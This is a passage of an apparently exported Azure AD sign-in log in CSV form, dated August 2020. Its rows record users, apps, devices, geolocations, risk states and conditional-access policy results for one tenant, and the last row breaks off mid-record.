'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",22fd8c7c-75eb-4549-80fa-1727a5530700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,low,atRisk,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,22fd8c7c-75eb-4549-80fa-1727a5530700,SigninLogs,Sucess,-20.54751015,-47.4056282
+111,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:50.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",37105d23-9607-4aeb-a84b-5fa310f60c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,37105d23-9607-4aeb-a84b-5fa310f60c00,SigninLogs,Sucess,50.6406517,5.572050095
+112,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:06.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,52c87a36-e704-4414-a543-96fd7d0ea47e,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:48,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.471', 'displayName': 'CALMENTROPY', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",20c66c98-b988-4bff-b971-b855bc383e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,20c66c98-b988-4bff-b971-b855bc383e00,SigninLogs,Sucess,35.01296997,-80.93171692
+113,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:43.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8ec9469f-2069-0000-5421-7f572a394e0f,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",6382c33b-18b0-46b9-982e-4aa96be01000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,6382c33b-18b0-46b9-982e-4aa96be01000,SigninLogs,Sucess,41.90428925,-85.99833679
+114,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:43.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f4c9469f-c0e8-0000-54b3-3fd420db0050,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",8046174b-712f-40d9-9f4e-13cd3e2a1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,8046174b-712f-40d9-9f4e-13cd3e2a1300,SigninLogs,Sucess,41.90428925,-85.99833679
+115,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:30.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,d35a04a6-36b3-4e15-8e78-455c3af1dad9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",9303d935-cf24-489a-bd00-a11c5c201200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,9303d935-cf24-489a-bd00-a11c5c201200,SigninLogs,Failed,33.7984581,-84.38828278
+116,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:38.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f21e73fe-8173-4436-ae8c-f77c62e1c9cc,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f8419ad1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ec85dd07-c5e8-494c-aa5b-3f8419ad1100,SigninLogs,Sucess,33.7984581,-84.38828278
+117,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:32.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5d9c265a-69fb-440e-9b79-89deb06b986b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",011e8186-a783-421c-9de9-87206dd51000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,011e8186-a783-421c-9de9-87206dd51000,SigninLogs,Sucess,50.6406517,5.572050095
+118,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:26.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b9732005-2698-4253-b3a8-6b37688f3c68,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 